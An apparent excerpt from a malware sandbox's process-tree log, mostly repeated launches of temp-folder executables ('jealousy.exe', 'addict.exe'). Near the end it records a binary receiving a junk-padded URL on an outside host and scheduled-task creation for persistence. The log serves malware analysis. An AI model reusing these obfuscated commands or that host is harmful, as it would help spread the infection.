"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4468

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6648

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6656

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:10060

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5496

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5320

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9708

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8908

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7640

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9148

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8036

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9580

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9224

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9428

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:436

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7328

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1716

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7856

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3172

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8200

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7872

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:10192

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9736

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7308

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6896

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8976

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2696

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7896

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8188

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8864

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9476

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7552

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1772

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2808

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4748

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3232

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9628

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7564

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8992

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1504

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8988

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7752

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8624

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6600

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8808

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8912

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6188

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8704

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9832

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9968

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7580

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3056

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5860

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6696

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9016

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7196

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7720

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8484

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9552

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9408

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8992

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7708

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:10072

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:10184

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6956

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9204

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8896

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3400

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6224

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7896

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9068

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8636

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7608

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6520

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8140

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9936

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9156

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9436

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9040

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6284

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9128

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8348

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7344

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2992

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4840

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9588

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7824

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8512

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8312

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9104

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7736

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3992

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7544

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8900

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8548

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1052

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6240

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5724

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:9356

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1496

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB
5⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessN"
5⤵
PID:6652

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessN".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:6808

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingN"
5⤵
PID:5464

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingN".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:5336

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
